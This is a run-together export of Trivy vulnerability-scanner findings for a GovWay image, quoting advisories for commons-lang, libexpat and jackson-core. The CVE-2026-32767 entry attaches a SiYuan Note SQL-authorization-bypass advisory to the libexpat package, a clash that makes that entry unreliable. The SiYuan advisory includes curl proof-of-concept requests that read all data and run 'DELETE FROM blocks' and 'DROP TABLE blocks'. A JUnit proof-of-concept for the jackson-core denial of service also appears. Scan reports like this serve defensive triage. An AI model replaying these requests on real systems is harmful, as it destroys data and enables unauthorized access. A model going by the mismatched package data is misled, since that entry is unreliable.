0--commons-lang-2.6.jar00-/var/govway/batch/generatoreStatistiche/lib/commons-lang-2.6.jarFALLBACK-f48ad3a611CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)trivyTrivy Security Scanner-1390NORMALcommons-lang-2.6.jar(1,0): CVE-2025-48924: : CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)CVE-2025-489240--govway00-/linkitaly/govwayFALLBACK-25b388a011CVE-2026-32767: OsPackageVulnerability SiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API For additional help see: **Vulnerability CVE-2026-32767** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |CRITICAL|libexpat|2.7.5-r0|[CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)| ## Summary SiYuan Note v3.6.0 (and likely prior versions) contains an authorization bypass vulnerability in the `/api/search/fullTextSearchBlock` endpoint. When the `method` parameter is set to `2`, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the `Reader` role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database. This is inconsistent with the application's own security model: the dedicated SQL endpoint (`/api/query/sql`) correctly requires both `CheckAdminRole` and `CheckReadonly` middleware, but the search endpoint bypasses these controls entirely. ## Root Cause Analysis ### The Vulnerable Endpoint **File:** `kernel/api/router.go`, line 188 ```go ginServer.Handle("POST", "/api/search/fullTextSearchBlock", model.CheckAuth, fullTextSearchBlock) ``` This endpoint only applies `model.CheckAuth`, which permits **any** authenticated role (Administrator, Editor, or Reader). ### The Properly Protected Endpoint (for comparison) **File:** `kernel/api/router.go`, line 177 ```go ginServer.Handle("POST", "/api/query/sql", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, SQL) ``` This endpoint correctly chains `CheckAdminRole` and `CheckReadonly`, restricting SQL execution to administrators in read-write mode. ### The Vulnerable Code Path **File:** `kernel/api/search.go`, lines 389-411 ```go func fullTextSearchBlock(c *gin.Context) { // ... page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg) blocks, matchedBlockCount, matchedRootCount, pageCount, docMode := model.FullTextSearchBlock(query, boxes, paths, types, method, orderBy, groupBy, page, pageSize) // ... } ``` **File:** `kernel/model/search.go`, lines 1205-1206 ```go case 2: // SQL blocks, matchedBlockCount, matchedRootCount = searchBySQL(query, beforeLen, page, pageSize) ``` When `method=2`, the raw `query` string is passed directly to `searchBySQL()`. **File:** `kernel/model/search.go`, lines 1460-1462 ```go func searchBySQL(stmt string, beforeLen, page, pageSize int) (ret []*Block, ...) { stmt = strings.TrimSpace(stmt) blocks := sql.SelectBlocksRawStmt(stmt, page, pageSize) ``` **File:** `kernel/sql/block_query.go`, lines 566-569, 713-714 ```go func SelectBlocksRawStmt(stmt string, page, limit int) (ret []*Block) { parsedStmt, err := sqlparser.Parse(stmt) if err != nil { return selectBlocksRawStmt(stmt, limit) // Falls through to raw execution } // ... } func selectBlocksRawStmt(stmt string, limit int) (ret []*Block) { rows, err := query(stmt) // Executes arbitrary SQL // ... } ``` **File:** `kernel/sql/database.go`, lines 1327-1337 ```go func query(query string, args ...interface{}) (*sql.Rows, error) { // ... return db.Query(query, args...) // Go's database/sql db.Query — executes ANY SQL } ``` Go's `database/sql` `db.Query()` will execute any SQL statement, including `DELETE`, `UPDATE`, `DROP TABLE`, `INSERT`, etc. The returned `*sql.Rows` will simply be empty for non-SELECT statements, but the destructive operation is still executed. ### Authorization Model **File:** `kernel/model/session.go`, lines 201-210 ```go func CheckAuth(c *gin.Context) { // Already authenticated via JWT if role := GetGinContextRole(c); IsValidRole(role, []Role{ RoleAdministrator, RoleEditor, RoleReader, // <-- Reader role passes CheckAuth }) { c.Next() return } // ... } ``` **File:** `kernel/model/session.go`, lines 380-386 ```go func CheckAdminRole(c *gin.Context) { if IsAdminRoleContext(c) { c.Next() } else { c.AbortWithStatus(http.StatusForbidden) // <-- This check is MISSING on the search endpoint } } ``` ## Proof of Concept ### Prerequisites - SiYuan instance accessible over the network (e.g., Docker deployment) - Valid authentication as any user role (including `Reader`) ### Steps to Reproduce 1. Authenticate to SiYuan and obtain a valid session cookie or API token. 2. **Read all data (confidentiality breach):** ```bash curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"method": 2, "query": "SELECT * FROM blocks LIMIT 100"}' ``` 3. **Delete all blocks (integrity/availability breach):** ```bash curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"method": 2, "query": "DELETE FROM blocks"}' ``` 4. **Drop tables (availability breach):** ```bash curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"method": 2, "query": "DROP TABLE blocks"}' ``` 5. **Compare with the properly protected endpoint** (should return HTTP 403 for Reader role): ```bash curl -X POST http://<target>:6806/api/query/sql \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"stmt": "SELECT * FROM blocks LIMIT 10"}' ``` ### Expected Behavior The search endpoint should reject SQL execution for non-admin users, or at minimum enforce read-only access, consistent with `/api/query/sql`. ### Actual Behavior Any authenticated user (including Reader role) can execute arbitrary SQL including destructive operations. ## Impact In a multi-user deployment (e.g., Docker with published access, or any network-accessible instance with access authorization code): - **Confidentiality:** A Reader-role user can read all data in the SQLite database, including blocks, assets, references, and configuration data they should not have access to. - **Integrity:** A Reader-role user can modify or delete any data in the database, despite having read-only access by design. - **Availability:** A Reader-role user can drop tables or corrupt the database, rendering the application unusable. ## Suggested Fix Add `CheckAdminRole` and `CheckReadonly` middleware to the search endpoint, or add explicit validation that only SELECT statements are accepted when `method=2`: **Option A — Restrict method=2 to admin (recommended):** In `kernel/api/search.go`, add a role check when `method=2`: ```go func fullTextSearchBlock(c *gin.Context) { // ... page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg) // SQL mode requires admin privileges, consistent with /api/query/sql if method == 2 && !model.IsAdminRoleContext(c) { ret.Code = -1 ret.Msg = "SQL search requires administrator privileges" return } // ... } ``` **Option B — Enforce SELECT-only for non-admin users:** Validate the parsed SQL to ensure only SELECT statements are executed when the user is not an administrator. Package: libexpat Installed Version: 2.7.4-r0 Vulnerability CVE-2026-32767 Severity: CRITICAL Fixed Version: 2.7.5-r0 Link: [CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)trivyTrivy Security Scanner-1390HIGHgovway(1,0): CVE-2026-32767: : CVE-2026-32767: OsPackageVulnerability SiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API For additional help see: **Vulnerability CVE-2026-32767** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |CRITICAL|libexpat|2.7.5-r0|[CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)| ## Summary SiYuan Note v3.6.0 (and likely prior versions) contains an authorization bypass vulnerability in the `/api/search/fullTextSearchBlock` endpoint. When the `method` parameter is set to `2`, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the `Reader` role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database. This is inconsistent with the application's own security model: the dedicated SQL endpoint (`/api/query/sql`) correctly requires both `CheckAdminRole` and `CheckReadonly` middleware, but the search endpoint bypasses these controls entirely. ## Root Cause Analysis ### The Vulnerable Endpoint **File:** `kernel/api/router.go`, line 188 ```go ginServer.Handle("POST", "/api/search/fullTextSearchBlock", model.CheckAuth, fullTextSearchBlock) ``` This endpoint only applies `model.CheckAuth`, which permits **any** authenticated role (Administrator, Editor, or Reader). ### The Properly Protected Endpoint (for comparison) **File:** `kernel/api/router.go`, line 177 ```go ginServer.Handle("POST", "/api/query/sql", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, SQL) ``` This endpoint correctly chains `CheckAdminRole` and `CheckReadonly`, restricting SQL execution to administrators in read-write mode. ### The Vulnerable Code Path **File:** `kernel/api/search.go`, lines 389-411 ```go func fullTextSearchBlock(c *gin.Context) { // ... page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg) blocks, matchedBlockCount, matchedRootCount, pageCount, docMode := model.FullTextSearchBlock(query, boxes, paths, types, method, orderBy, groupBy, page, pageSize) // ... } ``` **File:** `kernel/model/search.go`, lines 1205-1206 ```go case 2: // SQL blocks, matchedBlockCount, matchedRootCount = searchBySQL(query, beforeLen, page, pageSize) ``` When `method=2`, the raw `query` string is passed directly to `searchBySQL()`. **File:** `kernel/model/search.go`, lines 1460-1462 ```go func searchBySQL(stmt string, beforeLen, page, pageSize int) (ret []*Block, ...) { stmt = strings.TrimSpace(stmt) blocks := sql.SelectBlocksRawStmt(stmt, page, pageSize) ``` **File:** `kernel/sql/block_query.go`, lines 566-569, 713-714 ```go func SelectBlocksRawStmt(stmt string, page, limit int) (ret []*Block) { parsedStmt, err := sqlparser.Parse(stmt) if err != nil { return selectBlocksRawStmt(stmt, limit) // Falls through to raw execution } // ... } func selectBlocksRawStmt(stmt string, limit int) (ret []*Block) { rows, err := query(stmt) // Executes arbitrary SQL // ... } ``` **File:** `kernel/sql/database.go`, lines 1327-1337 ```go func query(query string, args ...interface{}) (*sql.Rows, error) { // ... return db.Query(query, args...) // Go's database/sql db.Query — executes ANY SQL } ``` Go's `database/sql` `db.Query()` will execute any SQL statement, including `DELETE`, `UPDATE`, `DROP TABLE`, `INSERT`, etc. The returned `*sql.Rows` will simply be empty for non-SELECT statements, but the destructive operation is still executed. ### Authorization Model **File:** `kernel/model/session.go`, lines 201-210 ```go func CheckAuth(c *gin.Context) { // Already authenticated via JWT if role := GetGinContextRole(c); IsValidRole(role, []Role{ RoleAdministrator, RoleEditor, RoleReader, // <-- Reader role passes CheckAuth }) { c.Next() return } // ... } ``` **File:** `kernel/model/session.go`, lines 380-386 ```go func CheckAdminRole(c *gin.Context) { if IsAdminRoleContext(c) { c.Next() } else { c.AbortWithStatus(http.StatusForbidden) // <-- This check is MISSING on the search endpoint } } ``` ## Proof of Concept ### Prerequisites - SiYuan instance accessible over the network (e.g., Docker deployment) - Valid authentication as any user role (including `Reader`) ### Steps to Reproduce 1. Authenticate to SiYuan and obtain a valid session cookie or API token. 2. **Read all data (confidentiality breach):** ```bash curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"method": 2, "query": "SELECT * FROM blocks LIMIT 100"}' ``` 3. **Delete all blocks (integrity/availability breach):** ```bash curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"method": 2, "query": "DELETE FROM blocks"}' ``` 4. **Drop tables (availability breach):** ```bash curl -X POST http://<target>:6806/api/search/fullTextSearchBlock \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"method": 2, "query": "DROP TABLE blocks"}' ``` 5. **Compare with the properly protected endpoint** (should return HTTP 403 for Reader role): ```bash curl -X POST http://<target>:6806/api/query/sql \ -H "Content-Type: application/json" \ -H "Authorization: Token <reader_token>" \ -d '{"stmt": "SELECT * FROM blocks LIMIT 10"}' ``` ### Expected Behavior The search endpoint should reject SQL execution for non-admin users, or at minimum enforce read-only access, consistent with `/api/query/sql`. ### Actual Behavior Any authenticated user (including Reader role) can execute arbitrary SQL including destructive operations. ## Impact In a multi-user deployment (e.g., Docker with published access, or any network-accessible instance with access authorization code): - **Confidentiality:** A Reader-role user can read all data in the SQLite database, including blocks, assets, references, and configuration data they should not have access to. - **Integrity:** A Reader-role user can modify or delete any data in the database, despite having read-only access by design. - **Availability:** A Reader-role user can drop tables or corrupt the database, rendering the application unusable. ## Suggested Fix Add `CheckAdminRole` and `CheckReadonly` middleware to the search endpoint, or add explicit validation that only SELECT statements are accepted when `method=2`: **Option A — Restrict method=2 to admin (recommended):** In `kernel/api/search.go`, add a role check when `method=2`: ```go func fullTextSearchBlock(c *gin.Context) { // ... page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg) // SQL mode requires admin privileges, consistent with /api/query/sql if method == 2 && !model.IsAdminRoleContext(c) { ret.Code = -1 ret.Msg = "SQL search requires administrator privileges" return } // ... } ``` **Option B — Enforce SELECT-only for non-admin users:** Validate the parsed SQL to ensure only SELECT statements are executed when the user is not an administrator. Package: libexpat Installed Version: 2.7.4-r0 Vulnerability CVE-2026-32767 Severity: CRITICAL Fixed Version: 2.7.5-r0 Link: [CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)CVE-2026-327670--govway00-/linkitaly/govwayFALLBACK-4b1da1cc11CVE-2026-32777: OsPackageVulnerability libexpat: libexpat: Denial of Service via infinite loop in DTD content parsing For additional help see: **Vulnerability CVE-2026-32777** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)| libexpat before 2.7.5 allows an infinite loop while parsing DTD content. Package: libexpat Installed Version: 2.7.4-r0 Vulnerability CVE-2026-32777 Severity: MEDIUM Fixed Version: 2.7.5-r0 Link: [CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)trivyTrivy Security Scanner-1390NORMALgovway(1,0): CVE-2026-32777: : CVE-2026-32777: OsPackageVulnerability libexpat: libexpat: Denial of Service via infinite loop in DTD content parsing For additional help see: **Vulnerability CVE-2026-32777** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)| libexpat before 2.7.5 allows an infinite loop while parsing DTD content. Package: libexpat Installed Version: 2.7.4-r0 Vulnerability CVE-2026-32777 Severity: MEDIUM Fixed Version: 2.7.5-r0 Link: [CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)CVE-2026-327770--govway00-/linkitaly/govwayFALLBACK-4b3a3abd11CVE-2026-32778: OsPackageVulnerability libexpat: libexpat: Denial of Service via NULL pointer dereference after out-of-memory condition For additional help see: **Vulnerability CVE-2026-32778** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)| libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition. Package: libexpat Installed Version: 2.7.4-r0 Vulnerability CVE-2026-32778 Severity: MEDIUM Fixed Version: 2.7.5-r0 Link: [CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)trivyTrivy Security Scanner-1390NORMALgovway(1,0): CVE-2026-32778: : CVE-2026-32778: OsPackageVulnerability libexpat: libexpat: Denial of Service via NULL pointer dereference after out-of-memory condition For additional help see: **Vulnerability CVE-2026-32778** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)| libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition. Package: libexpat Installed Version: 2.7.4-r0 Vulnerability CVE-2026-32778 Severity: MEDIUM Fixed Version: 2.7.5-r0 Link: [CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)CVE-2026-327780--commons-lang-2.6.jar00-/usr/local/tomcat/webapps/govway.war/WEB-INF/lib/commons-lang-2.6.jarFALLBACK-f48ad3a611CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)trivyTrivy Security Scanner-1390NORMALcommons-lang-2.6.jar(1,0): CVE-2025-48924: : CVE-2025-48924: LanguageSpecificPackageVulnerability commons-lang/commons-lang: org.apache.commons/commons-lang3: Uncontrolled Recursion vulnerability in Apache Commons Lang For additional help see: **Vulnerability CVE-2025-48924** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |MEDIUM|commons-lang:commons-lang||[CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)| Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue. Package: commons-lang:commons-lang Installed Version: 2.6 Vulnerability CVE-2025-48924 Severity: MEDIUM Fixed Version: Link: [CVE-2025-48924](https://avd.aquasec.com/nvd/cve-2025-48924)CVE-2025-489240--hazelcast-5.3.8.jar00-/usr/local/tomcat/webapps/govway.war/WEB-INF/lib/hazelcast-5.3.8.jarFALLBACK-2c9ace5a11GHSA-72hv-8253-57qq: LanguageSpecificPackageVulnerability jackson-core: Number Length Constraint Bypass in Async Parser Leads to Potential DoS Condition For additional help see: **Vulnerability GHSA-72hv-8253-57qq** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|com.fasterxml.jackson.core:jackson-core|2.18.6, 2.21.1, 3.1.0|[GHSA-72hv-8253-57qq](https://github.com/advisories/GHSA-72hv-8253-57qq)| ### Summary The non-blocking (async) JSON parser in `jackson-core` bypasses the `maxNumberLength` constraint (default: 1000 characters) defined in `StreamReadConstraints`. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS). The standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy. ### Details The root cause is that the async parsing path in `NonBlockingUtf8JsonParserBase` (and related classes) does not call the methods responsible for number length validation. - The number parsing methods (e.g., `_finishNumberIntegralPart`) accumulate digits into the `TextBuffer` without any length checks. - After parsing, they call `_valueComplete()`, which finalizes the token but does **not** call `resetInt()` or `resetFloat()`. - The `resetInt()`/`resetFloat()` methods in `ParserBase` are where the `validateIntegerLength()` and `validateFPLength()` checks are performed. - Because this validation step is skipped, the `maxNumberLength` constraint is never enforced in the async code path. ### PoC The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000. ```java package tools.jackson.core.unittest.dos; import java.nio.charset.StandardCharsets; import org.junit.jupiter.api.Test; import tools.jackson.core.*; import tools.jackson.core.exc.StreamConstraintsException; import tools.jackson.core.json.JsonFactory; import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser; import static org.junit.jupiter.api.Assertions.*; /** * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers * * Authors: sprabhav7, rohan-repos * * maxNumberLength default = 1000 characters (digits). * A number with more than 1000 digits should be rejected by any parser. * * BUG: The async parser never calls resetInt()/resetFloat() which is where * validateIntegerLength()/validateFPLength() lives. Instead it calls * _valueComplete() which skips all number length validation. * * CWE-770: Allocation of Resources Without Limits or Throttling */ class AsyncParserNumberLengthBypassTest { private static final int MAX_NUMBER_LENGTH = 1000; private static final int TEST_NUMBER_LENGTH = 5000; private final JsonFactory factory = new JsonFactory(); // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength @Test void syncParserRejectsLongNumber() throws Exception { byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH); // Output to console System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")"); try { try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) { while (p.nextToken() != null) { if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) { System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED"); } } } fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number"); } catch (StreamConstraintsException e) { System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage()); } } // VULNERABILITY: Async parser accepts the SAME number that sync rejects @Test void asyncParserAcceptsLongNumber() throws Exception { byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH); NonBlockingByteArrayJsonParser p = (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty()); p.feedInput(payload, 0, payload.length); p.endOfInput(); boolean foundNumber = false; try { while (p.nextToken() != null) { if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) { foundNumber = true; String numberText = p.getText(); assertEquals(TEST_NUMBER_LENGTH, numberText.length(), "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits"); } } // Output to console System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED"); assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token"); } catch (StreamConstraintsException e) { fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage()); } p.close(); } private byte[] buildPayloadWithLongInteger(int numDigits) { StringBuilder sb = new StringBuilder(numDigits + 10); sb.append("{\"v\":"); for (int i = 0; i < numDigits; i++) { sb.append((char) ('1' + (i % 9))); } sb.append('}'); return sb.toString().getBytes(StandardCharsets.UTF_8); } } ``` ### Impact A malicious actor can send a JSON document with an arbitrarily long number to an application using the async parser (e.g., in a Spring WebFlux or other reactive application). This can cause: 1. **Memory Exhaustion:** Unbounded allocation of memory in the `TextBuffer` to store the number's digits, leading to an `OutOfMemoryError`. 2. **CPU Exhaustion:** If the application subsequently calls `getBigIntegerValue()` or `getDecimalValue()`, the JVM can be tied up in O(n^2) `BigInteger` parsing operations, leading to a CPU-based DoS. ### Suggested Remediation The async parsing path should be updated to respect the `maxNumberLength` constraint. The simplest fix appears to ensure that `_valueComplete()` or a similar method in the async path calls the appropriate validation methods (`resetInt()` or `resetFloat()`) already present in `ParserBase`, mirroring the behavior of the synchronous parsers. **NOTE:** This research was performed in collaboration with [rohan-repos](https://github.com/rohan-repos) Package: com.fasterxml.jackson.core:jackson-core Installed Version: 2.15.2 Vulnerability GHSA-72hv-8253-57qq Severity: HIGH Fixed Version: 2.18.6, 2.21.1, 3.1.0 Link: [GHSA-72hv-8253-57qq](https://github.com/advisories/GHSA-72hv-8253-57qq)trivyTrivy Security Scanner-1390HIGHhazelcast-5.3.8.jar(1,0): GHSA-72hv-8253-57qq: : GHSA-72hv-8253-57qq: LanguageSpecificPackageVulnerability jackson-core: Number Length Constraint Bypass in Async Parser Leads to Potential DoS Condition For additional help see: **Vulnerability GHSA-72hv-8253-57qq** | Severity | Package | Fixed Version | Link | | --- | --- | --- | --- | |HIGH|com.fasterxml.jackson.core:jackson-core|2.18.6, 2.21.1, 3.1.0|[GHSA-72hv-8253-57qq](https://github.com/advisories/GHSA-72hv-8253-57qq)| ### Summary The non-blocking (async) JSON parser in `jackson-core` bypasses the `maxNumberLength` constraint (default: 1000 characters) defined in `StreamReadConstraints`. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS). The standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy. ### Details The root cause is that the async parsing path in `NonBlockingUtf8JsonParserBase` (and related classes) does not call the methods responsible for number length validation. - The number parsing methods (e.g., `_finishNumberIntegralPart`) accumulate digits into the `TextBuffer` without any length checks. - After parsing, they call `_valueComplete()`, which finalizes the token but does **not** call `resetInt()` or `resetFloat()`. - The `resetInt()`/`resetFloat()` methods in `ParserBase` are where the `validateIntegerLength()` and `validateFPLength()` checks are performed. - Because this validation step is skipped, the `maxNumberLength` constraint is never enforced in the async code path. ### PoC The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000. ```java package tools.jackson.core.unittest.dos; import java.nio.charset.StandardCharsets; import org.junit.jupiter.api.Test; import tools.jackson.core.*; import tools.jackson.core.exc.StreamConstraintsException; import tools.jackson.core.json.JsonFactory; import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser; import static org.junit.jupiter.api.Assertions.*; /** * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers * * Authors: sprabhav7, rohan-repos * * maxNumberLength default = 1000 characters (digits). * A number with more than 1000 digits should be rejected by any parser. * * BUG: The async parser never calls resetInt()/resetFloat() which is where * validateIntegerLength()/validateFPLength() lives. Instead it calls * _valueComplete() which skips all number length validation. * * CWE-770: Allocation of Resources Without Limits or Throttling */ class AsyncParserNumberLengthBypassTest { private static final int MAX_NUMBER_LENGTH = 1000; private static final int TEST_NUMBER_LENGTH = 5000; private final JsonFactory factory = new JsonFactory(); // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength @Test void syncParserRejectsLongNumber() throws Exception { byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH); // Output to console System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")"); try { try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) { while (p.nextToken() != null) { if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) { System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED"); } } } fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number"); } catch (StreamConstraintsException e) { System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage()); } } // VULNERABILITY: Async parser accepts the SAME number that sync rejects @Test void asyncParserAcceptsLongNumber() throws Exception { byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH); NonBlockingByteArrayJsonParser p = (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty()); p.feedInput(payload, 0, payload.length); p.endOfInput(); boolean foundNumber = false; try { while (p.nextToken() != null) { if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) { foundNumber = true; String numberText = p.getText(); assertEquals(TEST_NUMBER_LENGTH, numberText.length(), "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits"); } } // Output to console System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED"); assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token"); } catch (StreamConstraintsException e) { fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage()); } p.close(); } private byte[] buildPayloadWithLongInteger(int numDigits) { StringBuilder sb = new StringBuilder(numDigits + 10); sb.append("{\"v\":"); for (int i = 0; i < numDigits; i++) { sb.append((char) ('1' + (i % 9))); } sb.append('}'); return sb.toString().getBytes(StandardCharsets.UTF_8); } } ``` ### Impact A malicious actor can send a JSON document with an arbitrarily long number to an application using the async parser (e.g., in a Spring WebFlux or other reactive application). This can cause: 1. **Memory Exhaustion:** Unbounded allocation of memory in the `TextBuffer` to store the number's digits, leading to an `OutOfMemoryError`. 2. **CPU Exhaustion:** If the application subsequently calls `getBigIntegerValue()` or `getDecimalValue()`, the JVM can be tied up in 